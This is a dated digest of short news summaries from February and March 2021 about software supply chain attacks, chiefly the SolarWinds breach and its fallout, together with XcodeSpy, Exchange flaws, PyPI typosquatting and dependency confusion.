A malicious Xcode project known as XcodeSpy is targeting iOS devs in a supply chain attack to install a macOS backdoor on the developer's computer. Like other development environments, it is common for developers to create projects that perform specific functions and share them online so that other developers can add them to their own applications.


_______________________________________________________________________________________

(March 18, 2021)


NSA, Homeland Security push service to mitigate cyber-attacks

The National Security Agency and the Department of Homeland Security are encouraging government agencies and high-risk companies to embrace a system known as Protective DNS, in which a private security firm would monitor and filter web traffic. PDNS blocked connections to malicious websites millions of times in a recent test involving five U.S. defense contractors.

Ref - Bloomberg
 
_______________________________________________________________________________________

(March 18, 2021)


Will the U.S. never be safe from cyberattacks?

While Washington grapples with how to prevent another attack of this scale (SolarWinds breach), the hard truth is this: There’s no such thing as a foolproof cybersecurity defense. Because human beings write computer code. And despite being incredibly smart, those people make mistakes. And each minuscule error creates one more pathway for hackers to launch cyberattacks.

Ref - Yahoo

_______________________________________________________________________________________

(March 18, 2021)


Rethinking Patch management after SolarWinds breach

The SolarWinds breach, in which hackers inserted malware into software updates sent to thousands of customers and created a backdoor to their IT systems, suggests organizations need to rethink patch management. To identify known and potential vulnerabilities, security leaders need a software bill of materials (SBOM) for software and devices deployed into their environment, as well as for new updates and patches.


_______________________________________________________________________________________

(March 17, 2021)


Zero-trust helped Splunk dodge supply chain attack

Events like the SolarWinds breach are reminders of how important it is for organizations, especially high-profile organizations in industry and government to have a zero-trust architecture in place. A lot of organizations are building out a very in-depth set of data analytics capabilities, as a part of a broader zero-trust strategy. And then taking advantage of those things to improve visibility and security operations.


_______________________________________________________________________________________

(March 17, 2021)


SolarWinds attackers gained access to Mimecast’s production environment

Mimecast acknowledged that the threat actor responsible for the SolarWinds attack used the supply chain compromise to gain entry to a part of Mimecast’s production grid environment, accessing certain Mimecast-issued certificates and related customer-server-connection information.

Ref - SC Media

_______________________________________________________________________________________

(March 17, 2021)


Lawmakers drilled multiple agencies for SolarWinds attack

The bipartisan leaders of a House panel drilled multiple agencies for updates on the SolarWinds hack, a mass cyber campaign that compromised at least nine federal agencies and 100 private sector groups. Members of the Energy and Commerce Committee sent letters demanding answers to the leaders of the departments of Commerce, Energy, Health and Human Services, as well as the Environmental Protection Agency.

Ref - The Hill

_______________________________________________________________________________________

(March 17, 2021)


Spotting APT Activity associated with SolarWinds and Active Directory/M365 Compromise

CISA has released a table of tactics, techniques, and procedures used by the advanced persistent threat (APT) actor involved with the recent SolarWinds and Active Directory/M365 compromise. The table uses the MITRE ATT&CK framework to identify APT TTP and includes detection recommendations. This information will assist network defenders in detecting and responding to this activity.

Ref - CISA

_______________________________________________________________________________________

(March 17, 2021)


Key takeaways for security admins from SolarWinds attacks

Security and IT admins can take note of several key points regarding supply chain attacks. It can be said that potential supply chain attack victims lack access to the right tools. The golden SAML attack allowed attackers to jump from on-premises systems to cloud systems effectively bypassing MFA, thus showing the weaknesses in current authentication systems.

Ref - CSO Online 

_______________________________________________________________________________________

(March 17, 2021)


How the Linux Foundation’s software signing combats supply chain attacks

The Linux Foundation is launching sigstore, a free service jointly developed with Google, Red Hat, and Purdue University, that software developers can use to digitally sign their software releases. sigstore protects open source consumers from such attacks as dependency confusion attacks. These attacks dupe package managers into installing a remotely-hosted malicious version of a locally-available resource such as a library file.


_______________________________________________________________________________________

(March 16, 2021)


Biden's supply chain EO may uncover these cyber risks

While the government continues to assess the scope and scale of that breach, the White House is now directing various executive departments to assess the risks in their respective supply chains. The executive order calls for both 100-day immediate reviews of certain products, as well as year-long sectoral supply chain reviews of the defense, health, transportation, and agriculture industries, among others.

Ref - FCW 

_______________________________________________________________________________________

(March 16, 2021)


Mimecast decommissioned SolarWinds Orion after hack

The Lexington, Mass.-based email security vendor - Mimecast - became one of the first SolarWinds hack victims to publicly announce they’re dumping the industry-leading Orion network monitoring platform for a competing product. Industry experts had considered it unlikely that the hack would lead to many customers getting rid of SolarWinds due to the unique visibility and monitoring features Orion offers.

Ref - CRN

_______________________________________________________________________________________

(March 16, 2021)


SolarWinds underestimated network’s role in security

According to Juniper Networks VP of Security Business and Strategy Samantha Madrid, the SolarWinds hack has put a fine point on the importance of network security. While the full scope of the supply chain attack remains under investigation, it brought network visibility and the need for security enforcement at every point of connection into sharper focus.


_______________________________________________________________________________________

(March 16, 2021)


Using CodeQL to spot traces of Solorigate

If a build server is backdoored with the build hijacking component of the Solorigate malware campaign, the malware will inject additional source code at compilation time. If CodeQL is observing the build process on the infected server, it will extract the injected malicious source code together with the genuine source code. The resulting CodeQL database will therefore contain traces of the malicious Solorigate source code.

Ref - GitHub

_______________________________________________________________________________________

(March 16, 2021)


Mimecast confirms that SolarWinds hackers used Sunburst malware for initial intrusion

Mimecast has confirmed that the state-sponsored SolarWinds hackers who breached its network earlier this year used the Sunburst backdoor during the initial intrusion. Using this entry point, the threat actor accessed certain Mimecast-issued certificates and related customer server connection information.


_______________________________________________________________________________________

(March 16, 2021)


How to prevent supply chain attacks?

Here are 11 cybersecurity strategies that could help prevent supply chain attacks - implement honeytokens, secure privileged access management, implement a Zero trust architecture, assume about suffering a data breach, identify all potential insider threats and protect vulnerable resources, minimize access to sensitive data, implement strict shadow IT rules, send regular third-party risk assessments, monitor vendor network for vulnerabilities, and identify all vendor data leaks.

Ref - UpGuard

_______________________________________________________________________________________

(March 16, 2021)


Software supply chain attacks are not easy to tackle

As companies scramble to investigate whether their own systems and data were potentially impacted by the SolarWinds compromise, executives, boards, and customers are discovering that the threat of supply chain attacks expands beyond this one single incident and that mitigating the risks associated with them is not straightforward.


_______________________________________________________________________________________

(March 15, 2021)


Security ratings could raise the bar on cyber hygiene

Plans from the Biden administration to release a product security rating system could raise the bar for security overall but won’t likely prevent the next SolarWinds or Microsoft hacks. Experts say the simplicity of that concept is both its strength and its weakness: it’s a concept that is easy to understand and could drive compliance with a set of standards, but it won’t prevent more sophisticated attacks.


_______________________________________________________________________________________

(March 15, 2021)


Better security approach against supply chain attacks 

An effective procurement language should be developed, which is designed to hold a supplier or other third party contractually liable for the statements they make about the quality, reliability, and security of the software they are providing. Organizations need to consider the software and service provider processes when discussing a partnership and defining what security measures will be implemented.

Ref - Medium

_______________________________________________________________________________________

(March 15, 2021)


TIA reveals new global supply chain security standard - SCS 9001

The Telecommunications Industry Association (TIA) has published a new white paper on SCS 9001, the first process-based supply chain security standard for the information communications technology (ICT) industry. Scheduled to release later this year, the new standard will be measurable and verifiable as a means for service providers, manufacturers, and vendors to ensure that their supply chains meet the critical requirements needed to mitigate the risk of cybersecurity breaches and attacks.

Ref - Yahoo 

_______________________________________________________________________________________

(March 15, 2021)


SolarWinds attacks recovery could take the U.S. government 18 months

Brandon Wales, acting director of CISA, said that the U.S. government’s recovery effort from the SolarWinds supply chain attack could take well into 2022. This prediction reflects the complex nature of the breach and the length of time during which the attackers hid in their victims’ networks.


_______________________________________________________________________________________

(March 14, 2021)


White House seeks new cybersecurity approach after failing to detect hacks

The sophisticated hacks pulled off by Russia and China against a broad array of government and industrial targets in the United States and the failure of the intelligence agencies to detect them are driving the Biden administration and Congress to rethink how the nation should protect itself from growing cyber threats. Both attacks were run from inside the USA’s domestic servers, putting them out of reach of the NSA’s early warning system.


_______________________________________________________________________________________

(March 14, 2021)

Software Bill Of Materials: an efficient mitigation strategy for supply chain attacks

There is an efficient mitigation strategy for supply chain attacks: the bill of materials, or “BOM”. In its simplest form, the BOM is similar to a long list of ingredients, in which all materials and quantities needed to manufacture an end product are listed. If the “BOM” is done with great precision, it is possible to provide deep insight into the product and all its parts and its corresponding supply chain vulnerabilities.

Ref - Medium

_______________________________________________________________________________________

(March 13, 2021)


Security best practices after SolarWinds supply chain attack

Implementing the supply chain security best practices can help mitigate third-party risk and meet the needs of the changing enterprise ecosystem. Users are recommended to conduct asset and access inventories, elevate third-party risk management and ensure third-party relationships are collaborative.


_______________________________________________________________________________________

(March 12, 2021)


A senior administration official on the response to the Microsoft and SolarWinds intrusions

According to a senior administration official, they are in week three of four-week remediation across the federal government. The compromised agencies were all tasked to do a particular set of activities and then were tasked to have an independent review of their work to ensure the adversary had been eradicated. Most of the agencies have completed that independent review and the rest will complete it by the end of March.


_______________________________________________________________________________________

(March 12, 2021)


SolarWinds and Microsoft hacks spark debate over western retaliation

Cyber experts have cautioned that retaliation steps against SolarWinds and Microsoft hacks may not be justified. The SolarWinds and Microsoft hacks are not incidences of conflict in any sort of conventional sense, they’re espionage, so they’re part of continual interaction between these states.


_______________________________________________________________________________________

(March 12, 2021)


The first-ever U.S. national cyber director after SolarWinds breach

The new national cyber director will be responsible for crafting a national cyber strategy as well as driving more consistency across civilian government networks. If disaster strikes, the director will serve as the point person in coordinating the government’s nonmilitary response. 

Ref - Fortune

_______________________________________________________________________________________

(March 11, 2021)


Risks of supply chain attacks for organizations

Supply chain security risks are not new, but recent headlines are a reminder for consumers to re-examine their security practices. The SolarWinds/Orion cyberattack had impacted more than 18,000 organizations, and it might serve as the major point of attention for dealing with digital supply chain risks.

Ref - Synopsys

_______________________________________________________________________________________

(March 11, 2021)


Managing supply chain security risk 

After the SolarWinds attack, it is important that information security and risk management teams need to think beyond third-party and vendor risk management. Supply chain risk management should be built on existing standardized practices across many existing risk practices and disciplines. It also requires cooperation and collaborative relationships within all areas of the organization.


_______________________________________________________________________________________

(March 11, 2021)


Embedded devices are a blind spot in the SolarWinds attack

The SolarWinds attackers accessed the network, be it Office 365 or VMware, and a separate campaign that exploited a bug in SolarWinds. However, the industry is overlooking a more nefarious but equally plausible objective: Attackers may have used SolarWinds as a pathway into key networks where they could access and burrow deep into the embedded devices in industrial control systems.

Ref - The Hill

_______________________________________________________________________________________

(March 11, 2021)


Nation-state hackers exploited the U.S. Internet security gap

U.S. lawmakers and security experts are voicing concern that foreign governments are staging cyberattacks using servers in the U.S., in an apparent effort to avoid detection by America’s principal cyberintelligence organization. When hackers recently targeted servers running Microsoft Corp.’s Exchange software, they employed U.S.-based computers from at least four service providers to mount their attack, according to an analysis by the threat intelligence company DomainTools LLC.


_______________________________________________________________________________________

(March 10, 2021)


Risks of integrating technology vulnerabilities into the foundational technology

SolarWinds attacks and other events in 2020 spotlight a new burden to manage for C-Suites/Boards: The malicious supply chain influences of nation-state intelligence services. In recent supply chain attacks, the adversaries are not just finding & exploiting technology vulnerabilities, but actually creating & integrating them into the foundational technology. 

Ref - Forbes

_______________________________________________________________________________________

(March 10, 2021)


Hacker group claims access to internal video feeds by compromising supplier

Hackers said they accessed internal video feeds at several companies, including Tesla Inc., and at public agencies by breaching the network of security-camera vendor Verkada Inc., the latest cybersecurity incident in which a supplier unwittingly opened a back door into client networks. The group found a username and password for a Verkada administrative account on the internet, permitting them to obtain the footage.


_______________________________________________________________________________________

(March 10, 2021)


How to beat the new breed of Supply Chain attacks

The plethora of new malware strains (e.g., SUNBURST, SUPERNOVA, GoldMax, Sibot, and GoldFinder) that have emerged in the wake of the SolarWinds breach should force all enterprises to take the supply chain attack vector seriously. Comparing traditional supply chain attacks with the recent SolarWinds and Microsoft hacks, it is clear that attackers have upped their game to a whole new level, both in sophistication and tactics.

Ref - SentinelOne 

_______________________________________________________________________________________

(March 10, 2021)


Monitoring the software supply chain in Microsoft environment

Microsoft has described ways to monitor the software development, build, and release process via Azure Sentinel, specifically to detect any NOBELIUM-related activity. The blog uses Microsoft’s security monitoring solution Azure Sentinel, and Microsoft’s cloud CI/CD solution Azure DevOps as the focus point, however, the monitoring principles and approaches could also be applied to other technology stacks.

Ref - Microsoft 

_______________________________________________________________________________________

(March 10, 2021)


SolarWinds is not an isolated event going forward - VMware Report

The 2021 Global Cybersecurity Outlook report from VMware Security Business Unit suggests that “island-hopping” attacks are on a rise, in which attackers jump from one network to another along a supply chain, as occurred in the SolarWinds attack. Organizations have to realize that it’s no longer simply about whether breaches along their supply chains can be leveraged to attack them, but whether they themselves can be used to attack their customers.


_______________________________________________________________________________________

(March 9, 2021)


The inside story of the stealthy SolarWinds SUNBURST attack

The SolarWinds attack was performed without weaponizing a (yet known) zero-day vulnerability. The attackers were able to make their malicious version of the SolarWinds Orion DLL look like a normal version of the software. It was virtually impossible to detect because everything looked official. But as they begin to move through a network by accessing new accounts, a lack of normal behavior of all these targeted users and devices they’re operating opens a new window of opportunity for detection.

Ref - Varonis 


_______________________________________________________________________________________

(March 9, 2021)


The separate SolarWinds attack described by researchers

Russian hackers apparently weren't the only ones targeting SolarWinds customers. Researchers from Secureworks discovered the ‘Spiral’ attack on one organization in November 2020, when they spotted hackers exploiting a SolarWinds Orion API vulnerability on an internet-facing SolarWinds server during an incident response effort. Spiral's activities are separate from the SolarWinds supply chain compromise first reported in December 2020


_______________________________________________________________________________________

(March 9, 2021)


Microsoft released a patch for older versions of Exchange

Microsoft has released security updates for unsupported versions of Exchange email servers following widespread attacks exploiting four newly discovered security vulnerabilities. The security updates for older versions of Exchange only address the four newly disclosed flaws that are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. The issues affect on-premise Exchange servers.

Ref - ZDNet

_______________________________________________________________________________________

(March 9, 2021)


Implications of recent supply chain attacks

The implications of SolarWinds have made all CSOs rethink their approach to cybersecurity. For decades, manufacturing equipment would operate in isolation from public networks to keep adversarial agents from gaining access and potentially disrupting operations. However, as supply chains became more intertwined with operations, third parties were granted access to those systems in order to automate the ordering and fulfillment of maintenance and materials.

Ref - Forbes

 _______________________________________________________________________________________

(March 9, 2021)


Analysis of the biggest Python supply chain attack ever

On March 1st, 2021, a newly created account on the Python Package Index PyPI uploaded 3591 new packages. Each package had a name that closely resembled the name of another popular package. However, the script is only signaling to someone that it was successfully downloaded and installed but does nothing beyond that. This could be the work of a security researcher who wanted to raise awareness about typosquatting supply chain attacks, by publishing a lot of fake packages and collecting statistics about how many times each one was downloaded.

Ref - Sogeti

_______________________________________________________________________________________

(March 9, 2021)


More clues appear to link Supernova web shell activity to China

According to Secureworks' new report, the authentication bypass vulnerability in SolarWinds Orion API, tracked as CVE-2020-10148, that can lead to remote execution of API commands, has been actively exploited by Spiral. When vulnerable servers are detected and exploited, a script capable of writing the Supernova web shell to disk is deployed using a PowerShell command.

Ref - TechRadar 

_______________________________________________________________________________________

(March 8, 2021)


‘Retaliation’ for Russia's SolarWinds spying might not be a good idea for the US

Before the US mounts a saber-rattling counterattack, it should pin down exactly what line Russia crossed. Any rule that could justify SolarWinds' retaliation is one that the US also violates with its own cyberespionage. And there's still no evidence that Russia's hacking, in this case, went beyond stealthy intelligence gathering of the sort the US performs routinely around the world.

Ref - Wired 

_______________________________________________________________________________________

(March 8, 2021)


Hackers who hid Supernova malware in SolarWinds Orion linked to China

Intrusion activity related to the Supernova malware, that was planted on compromised SolarWinds Orion installations exposed on the public internet, points to an espionage threat actor based in China. Security researchers named this hacker group ‘Spiral’ and correlated findings from two intrusions in 2020 on the same victim network to determine activity from the same intruder.


_______________________________________________________________________________________

(March 8, 2021)


SolarWinds Breach: Supernova malware linked to a China-based threat group

Secureworks' counter-threat unit (CTU) said that during late 2020, a compromised Internet-facing SolarWinds server was used as a springboard to deploy Supernova, a .NET web shell. Similar intrusions on the same network suggest that the Spiral threat group, suspected of a Chinese origin, is to blame for both cases. According to the researchers, CVE-2020-10148 has been actively exploited by Spiral.

Ref - ZDNet

_______________________________________________________________________________________

(March 8, 2021)


A supply chain attack is targeting the Python community with 4000 fake modules

A user has uploaded 3951 utterly bogus PyPI packages, the names of which resemble the near-miss domain names of several genuine Python Packages. None of these fake packages contained outright malware, or indeed any permanent package code at all. However, some of them (if not all) included a Python command that was intended to run when the package was installed, rather than when it was used.

Ref - Sophos

_______________________________________________________________________________________

(March 6, 2021)


This new type of supply-chain attack has serious consequences 

A new type of supply chain attack (dubbed Dependency Confusion) unveiled last month is targeting more and more companies, with new rounds this week taking aim at Microsoft, Amazon, Slack, Lyft, Zillow, and an unknown number of others. In weeks past, Apple, Microsoft, Tesla, and 32 other companies were targeted by a similar attack that allowed a security researcher to execute unauthorized code inside their networks.


_______________________________________________________________________________________

(March 5, 2021)


A supply chain attack has breached multiple airlines

A communications and IT vendor for 90 percent of the world’s airlines, SITA, has been breached, compromising passenger data stored on the company’s U.S. servers in what the company is calling a highly sophisticated attack. The affected servers are in Atlanta and belong to the SITA Passenger Service System (SITA PSS).


_______________________________________________________________________________________

(March 5, 2021)


Singapore is the latest victim of supply chain attack

An aviation IT company, that says it serves 90% of the world's airlines, has been breached in what appears to be a coordinated supply chain attack. Customers of at least four companies - Malaysia Airlines, Singapore Airlines, Finnair Airlines, and Air New Zealand - may have been affected by the incident.


_______________________________________________________________________________________

(March 5, 2021)


Microsoft is now adopting an aggressive strategy for sharing SolarWinds hack intel

Rob Lefferts, corporate vice president for Microsoft 365 Security in Security and Compliance, explains the company's approach to keeping its customers and the industry apprised and updated on its findings from the now-infamous SolarWinds attack. In the wake of a widespread cyberattack, enterprise IT providers can play a key role in how businesses learn about and mitigate the security threat.


_______________________________________________________________________________________

(March 5, 2021)


SolarWinds: 30,000 organizations' email hacked via Microsoft Exchange Server vulnerabilities 

Four exploits found in Microsoft’s Exchange Server software have reportedly led to over 30,000 US governmental and commercial organizations having their emails hacked, according to a report by KrebsOnSecurity. The vulnerabilities allowed hackers to gain access to email accounts, and also gave them the ability to install malware that might let them back into those servers at a later time.

Ref - The Verge

_______________________________________________________________________________________

(March 4, 2021)


Researchers disclosed additional malware linked to SolarWinds attackers

Researchers with Microsoft and FireEye found three new malware families (named as GoldMax, Sibot, and GoldFinder), which they said are used by the threat group behind the SolarWinds attack. Researchers have uncovered more custom malware that is being used by the threat group behind the SolarWinds attack.


_______________________________________________________________________________________

(March 3, 2021)


Malicious code bombs are targeting Amazon, Lyft, Slack, Zillow via supply chain attacks

Attackers have weaponized code dependency confusion to target internal apps at tech giants. Researchers have spotted malicious packages targeting internal applications for Amazon, Lyft, Slack, and Zillow (among others) inside the npm public code repository — all of which exfiltrate sensitive information.


_______________________________________________________________________________________

(March 3, 2021)


SolarWinds breach showed increased sophistication of advanced threat actors

Microsoft has highlighted the increasingly sophisticated cyber-threat landscape, particularly as a result of the rise in nation-state attacks. During a session at the Microsoft Ignite event, the company outlined some of the trends it is seeing and actions it is taking to help mitigate them in the future.


_______________________________________________________________________________________

(March 2, 2021)


SolarWinds breach cost $3.5 million in expenses 

SolarWinds has reported expenses of $3.5 million from last year's supply-chain attack, including costs related to incident investigation and remediation. Further expenses were recorded by SolarWinds after paying for legal, consulting, and other professional services related to the December hack and provided to customers for free.


_______________________________________________________________________________________

(March 1, 2021)


Dependency Confusion is being used to create copycat packages

Sonatype has identified new “dependency confusion” packages published to the npm ecosystem that are malicious in nature. These squatted packages are named after repositories, namespaces, or components used by popular companies such as Amazon, Zillow, Lyft, and Slack.

Ref - Sonatype

_______________________________________________________________________________________

(March 2, 2021)


The SolarWinds hack compromised NASA and FAA

In addition to infiltrating the unclassified networks of seven other US government agencies, the suspected Russian hackers who compromised the IT services firm SolarWinds as a jumping-off point also penetrated NASA and the Federal Aviation Administration. The seven other breached agencies are the Departments of Commerce, Homeland Security, Energy, and State, the US Treasury, the National Institutes of Health, and the Justice Department. The White House said earlier this month that hackers also compromised 100 companies in the spree.

Ref - Wired

_______________________________________________________________________________________

(February 25, 2021)

Microsoft now sharing CodeQL queries for scanning SolarWinds-like implants code

Microsoft has open-source CodeQL queries that developers can use to scan source code for malicious implants matching the SolarWinds supply-chain attack. To make sure the attackers did not modify their code, Microsoft created CodeQL queries that were used to scan their codebase for malicious implants matching the SolarWinds IOCs.


_______________________________________________________________________________________

(February 25, 2021)


Security experts were blindsided by the SolarWinds attack

The SolarWinds cyberattack on U.S. government agencies and private organizations was and is frightening in its scale and success. It proved no match for the government agencies charged with defending against such things and brought into sharp focus the fact that the government’s current model for responding to cyber threats is lacking. In a sense, the SolarWinds attack seemed designed to exploit a lack of communication and cooperation between government and private-sector security experts.

Ref - Medium

_______________________________________________________________________________________

(February 25, 2021)


SolarWinds hackers take advantage of Amazon Elastic Compute Cloud

Amazon Web Services admitted that hackers used its systems in the SolarWinds campaign but reiterated the cloud computing giant wasn’t itself infected with malware. The actors used EC2 [Amazon Elastic Compute Cloud] just like they would use any server they could buy or use anywhere (on-premises or in the cloud). And, in fact, the actors did use several different service providers in this manner.

Ref - CRN

_______________________________________________________________________________________

(February 24, 2021)


SolarWinds breach is one of the biggest attacks ever - US Senate committee

The United States Senate's select committee on intelligence met to hear evidence from tech executives regarding the historic hack on Texas-based company SolarWinds. The committee heard that both the scale and sophistication of the attack were greater than had been previously thought.


_______________________________________________________________________________________

(February 24, 2021)


More SolarWinds breach victims could still be undisclosed

Microsoft believes that the SolarWinds hackers may have used up to a dozen different means of getting into victims’ networks over the past year, a higher estimate than previously understood. It is likely that more brand-name players may have been penetrated by the SolarWinds breach. They are not forthcoming as other victims did, thus leaving policymakers and potential customers in the dark.

Ref - WSJ

_______________________________________________________________________________________

(February 24, 2021)


Important takeaways from the US Senate's hearing of SolarWinds breach

The Senate Intelligence Committee held its first public hearing on the SolarWinds hack and there are five key takeaways- fingers pointed to Russia as the hack's perpetrator and companies want the US to hold Russia accountable. Amazon was a no-show despite being invited, and lawmakers weren't happy about it. Lawmakers and tech leaders agreed that there should be more robust information-sharing around cyber threats. A new law setting standards for breached companies could be on the horizon. In addition, the hearings showed cooperation between the government and industry.


_______________________________________________________________________________________

(February 24, 2021)


SolarWinds hackers targeted NASA and Federal Aviation Administration networks

Hackers are said to have broken into the networks of U.S. space agency NASA and the Federal Aviation Administration as part of a wider espionage campaign targeting U.S. government agencies and private companies. The two agencies were named by the Washington Post, hours ahead of a Senate Intelligence Committee hearing tasked with investigating the widespread cyberattack.


_______________________________________________________________________________________

(February 24, 2021)


There is substantial evidence of Russian involvement in SolarWinds breach

Microsoft directly blamed Russia's foreign intelligence service for the devastating security breach of at least nine federal agencies and dozens of private businesses, going further than US government officials have to date in their public attribution for the hack. Microsoft President Brad Smith said it would likely take time for the US government to formally reach the same conclusion.

Ref - CNN

_______________________________________________________________________________________

(February 23, 2021)


SolarWinds attackers stayed for several months in FireEye's network

The attackers who infiltrated SolarWinds Orion's software build and updates had spent several months embedded in FireEye's network. The attacker wasn't alive every single day on their network, Kevin Mandia, CEO of FireEye told the US Senate Intelligence Committee in response to a question about the attack time frame on FireEye's network.


_______________________________________________________________________________________

(February 23, 2021)


Finding answers on the SolarWinds breach

Key senators and corporate executives warned at a hearing on SolarWinds breach that the “scope and scale” of the recent hacking of government agencies and companies, the most sophisticated in history, were still unclear. The National Security Agency, despite spending billions of dollars planting sensors in networks around the world, missed the evidence for more than a year.


_______________________________________________________________________________________

(February 23, 2021)


AWS infrastructure was used in SolarWinds hack

Senators slammed Amazon Web Services for refusing to testify at a hearing about the SolarWinds intrusion given the public cloud giant’s infrastructure was used in the attack. Specifically, Amazon Web Services hosted most of the secondary command and control nodes in the SolarWinds attack.

Ref - CRN

_______________________________________________________________________________________

(February 23, 2021)


Mandatory breach disclosure in wake of SolarWinds breach

Lawmakers and witnesses at the Senate Intelligence Committee’s hearing on SolarWinds emphasized the possibility of legislation mandating certain businesses to disclose some breaches to the federal government. Currently, there is no rule mandating a company like FireEye to disclose a breach to the federal government, even when national security is a concern.

Ref - SCMagazine

_______________________________________________________________________________________

(February 23, 2021)


There could be more tech firms besides SolarWinds - used to hack targets

The hackers used a variety of legitimate software and cloud hosting services to access the systems of nine federal agencies and 100 private companies. They used Amazon Web Services cloud hosting to disguise their intrusions as benign network traffic. Additionally, the hackers didn't use the malware planted in SolarWinds' Orion products to breach nearly a third of the victims. Instead, they had access to other hacking techniques, all of which investigators are still unraveling.

Ref - CNET

_______________________________________________________________________________________

(February 23, 2021)


Reasons why SolarWinds was so vulnerable to a hack

SolarWinds outsourced much of its software engineering to cheaper programmers overseas, even though that typically increases the risk of security vulnerabilities. For a while, in 2019, the update server’s password for SolarWinds network management software was reported to be “solarwinds123.” Russian hackers were able to breach SolarWinds own email system and lurk there for months.


_______________________________________________________________________________________

(February 23, 2021)


Biden administration preparing to sanction Russia for SolarWinds hacks

The Biden administration is preparing sanctions and other measures to punish Moscow for actions that go beyond the sprawling SolarWinds cyber espionage campaign to include a range of malign cyber activity and the near-fatal poisoning of a Russian opposition leader, said U.S. officials familiar with the matter.


_______________________________________________________________________________________

(February 23, 2021)


SolarWinds hack grabs senate spotlight 

The Senate Intelligence Committee, led by Senator Mark Warner, will convene for the first public hearing on the attack, which was disclosed in December. It will hear testimony from Sudhakar Ramakrishna, the president, and chief executive officer of SolarWinds, and Microsoft Corp. President Brad Smith, in addition to Crowdstrike Holdings Inc. CEO George Kurtz and Kevin Mandia, CEO of FireEye Inc.

Ref - Bloomberg 

_______________________________________________________________________________________

(February 23, 2021)


The Anatomy of the SolarWinds attack chain

The compromise of identity and manipulation of privileged access was instrumental in the success of the SolarWinds attack. Researchers are trying to deconstruct the attack so organizations can better understand what they’re up against and prioritize efforts to reduce the most risk.

Ref - CyberArk 

_______________________________________________________________________________________

(February 23, 2021)


Top executives from SolarWinds, Microsoft, FireEye, CrowdStrike face Senate grilling

Top executives at Texas-based software company SolarWinds, digital giant Microsoft and cybersecurity firms FireEye and CrowdStrike are expected to defend their companies’ responses to a sprawling series of breaches blamed on Russian hackers when they face the U.S. Senate’s Select Committee on Intelligence.

Ref - Reuters 

_______________________________________________________________________________________

(February 22, 2021)


The U.S. House committee hearing on 'SolarWinds' hack

The U.S. House of Representatives’ Oversight and Homeland Security Committees will hold a joint hearing on 26 February on cybersecurity incidents including the attack targeting SolarWinds Orion Software. Top executives from SolarWinds Corp, FireEye Inc, and Microsoft Corp will testify at the hearing.

Ref - Reuters

_______________________________________________________________________________________

(February 22, 2021)


SolarWinds-like breach could have happened to anyone

In the first of several public appearances, the CEO of SolarWinds is publicly discussing the breach of his company's software two months after reports surfaced that multiple government agencies may have been breached through a backdoor vulnerability. His message to others: this could have happened to anyone.

Ref - FCW

_______________________________________________________________________________________

(February 22, 2021)


Lessons learned from SolarWinds breach 

According to the CEO of SolarWinds, there are three lessons from the recent attack - the first one is how to improve the infrastructure security within the enterprise. The second is how to improve the build infrastructure within the enterprise. The third is, how to improve software development processes and life cycles to the point where they essentially evolve to become secure development lifecycle processes.

Ref - CSIS.org

_______________________________________________________________________________________

(February 22, 2021)


SolarWinds hackers continued attacking Microsoft until January

The SolarWinds hackers continued efforts to infiltrate Microsoft until early January, keeping up the assault even after Microsoft revealed its source code had been compromised. The hackers lost source repository access after Microsoft secured its compromised accounts, but the threat actor kept making unsuccessful attempts to regain access all the way until early January.

Ref - CRN 

_______________________________________________________________________________________

(February 22, 2021)


Researchers expecting another SolarWinds attack

People are too reliant on technology like email to protect themselves with digital walls they’ve long outgrown. There will certainly be another SolarWinds until we remember the more fundamental question of “what does the attacker want?” and work to apply it on all possible platforms.

Ref - SC Mag 

_______________________________________________________________________________________

(February 21, 2021)


National security adviser talks about vows for a quick response to SolarWinds hack

White House national security adviser Jake Sullivan said the White House has asked the intelligence community to do more work to sharpen the attribution made by the Trump administration. This includes details about how the hack occurred, the extent of the damage, and the scope and scale of the breach.

Ref - CBS News 

_______________________________________________________________________________________

(February 20, 2021)


Within weeks, the US will be prepared to take the first steps to respond to SolarWinds attacks

National security adviser Jake Sullivan has said that the US will be taking a series of steps to respond to the devastating SolarWinds cyber hack and hold accountable those responsible within a few weeks instead of months, as anticipated earlier. The Biden administration is focused on identifying more precisely the culprit behind the suspected Russian spying campaign that targeted at least nine federal agencies and at least 100 private-sector businesses.

Ref - CNN 

_______________________________________________________________________________________

(February 19, 2021)


SolarWinds hackers had access to Microsoft source code

The hackers behind the worst intrusion of U.S. government agencies in years won access to Microsoft’s secret source code for authenticating customers, potentially aiding one of their main attack methods. Microsoft had said before that the hackers had accessed some source code, but had not said which parts, or that any had been copied.

Ref - Reuters

_______________________________________________________________________________________

(February 19, 2021)


The scale of the SolarWinds breach is now visible

In a recent interview with CBS News’ 60 Minutes, Microsoft president Brad Smith answered many questions as to the scale of the attack and Microsoft’s unprecedented response to the incident. As to the scale, Smith and many others believe that the attack may have been the largest and most sophisticated the world has seen. Other reports estimate that 18,000 organizations may have been impacted by the attack.

Ref - PCrisk

_______________________________________________________________________________________

(February 18, 2021)


Microsoft recommends zero-trust architecture after SolarWinds attacks

The Microsoft Security Research Center, which has shared learnings and guidance throughout the Solorigate incident, confirmed that following the completion of their internal investigation they found no evidence that Microsoft systems were used to attack others. However, the tech firm recommended that organizations should deploy zero-trust architecture and defense-in-depth protection. 

Ref - Microsoft

_______________________________________________________________________________________

(February 19, 2021)


SolarWinds hackers had access to Microsoft’s secret source code

The hackers behind the intrusion of U.S. government agencies had access to Microsoft’s secret source code for authenticating customers. Some of the code was downloaded, the company said, which would have allowed the hackers even more freedom to hunt for security vulnerabilities, create copies with new flaws, or examine the logic for ways to exploit customer installations.

Ref - Reuters

_______________________________________________________________________________________

(February 18, 2021)


Need of contact tracing approach after SolarWinds breach

According to researchers, the recent SolarWinds breach shows a need for a contact tracing approach for organizations to strengthen their own internal investigations. It can dramatically reduce the time it takes to discover how far an attacker has penetrated into their networks, and identify if other related systems in their supply chains, customers, and partner networks have also been compromised.

Ref - Fortune

_______________________________________________________________________________________

(February 18, 2021)


Microsoft pushes companies toward zero trusts after SolarWinds breach

Vasu Jakkal, Microsoft corporate vice president of security, compliance and identity, has said that none of Microsoft’s internal systems were used to attack others because of the zero trust approach followed by the company. The probe also found no evidence of access to Microsoft’s production services or customer data.

Ref - SC Media

_______________________________________________________________________________________

(February 18, 2021)


SolarWinds attackers downloaded Azure and Exchange source code

Microsoft announced that the SolarWinds hackers gained access to source code for a limited number of Azure, Intune, and Exchange components. For a small number of repositories, there was additional access, and downloading of component source code. These repositories contained code for a small subset of Azure components, Intune components, and Exchange components.


_______________________________________________________________________________________

(February 18, 2021)


